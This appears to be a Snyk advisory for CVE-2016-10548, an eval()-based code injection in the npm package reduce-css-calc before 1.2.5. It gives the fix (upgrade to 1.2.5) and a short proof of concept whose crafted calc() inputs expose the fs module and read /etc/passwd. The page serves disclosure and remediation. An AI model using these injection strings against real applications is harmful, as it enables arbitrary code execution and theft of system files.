Arbitrary Code Injection Affecting reduce-css-calc package, versions <1.2.5
Snyk CVSS
Attack Complexity
Low
User Interaction
Required
Scope
Changed
Threat Intelligence
EPSS
0.19% (56th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID npm:reduce-css-calc:20160913
- published 17 Oct 2016
- disclosed 20 Aug 2016
- credit Сковорода Никита Андреевич (ChALkeR)
Introduced: 20 Aug 2016
CVE-2016-10548 Open this link in a new tabHow to fix?
Upgrade reduce-css-calc
version 1.2.5 or greater.
Overview
reduce-css-calc
is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval()
for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.
Example
The issue was reported by ChALkeR and demonstrated by his example below:
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));